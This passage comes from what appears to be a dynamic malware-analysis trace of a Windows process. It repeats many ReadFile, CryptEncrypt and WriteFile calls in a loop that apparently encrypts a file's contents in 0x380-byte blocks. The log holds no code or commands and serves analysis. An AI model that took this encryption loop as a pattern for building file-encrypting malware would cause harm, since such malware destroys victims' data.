pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.934] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.934] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.934] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.934] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.934] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.934] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.934] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.934] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.934] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.934] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.934] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.934] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.934] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.934] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.934] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.934] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.935] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.935] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.935] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.935] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.935] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.935] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.935] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.935] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.935] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.935] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.935] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.935] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.935] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.935] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.935] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.935] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.935] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.935] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.935] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.935] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.936] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.936] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.936] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.936] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.936] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.936] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.936] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.936] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.936] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.936] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.936] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.936] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.936] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.936] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.939] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.939] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.939] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.939] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.939] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.939] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.939] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.939] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.939] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.939] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.939] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.940] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.940] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.940] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.940] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.940] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.940] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.940] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.940] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.940] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.940] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.940] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.940] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.940] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.940] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.940] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.940] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.940] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.940] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.940] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.940] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.941] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.941] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.941] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.941] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.941] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.941] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.941] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.941] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.941] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.941] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.941] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.941] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.941] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.941] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.941] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.941] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.941] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.941] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.942] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.942] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.942] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x279bf88*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0231.942] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf88, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0231.942] ReadFile (in: hFile=0x5d14, lpBuffer=0x279bf88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf88*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0231.942] CryptEncrypt (in: hKey=0x27172a8, hHash=0x0, Final=0, dwFlags=0x0, 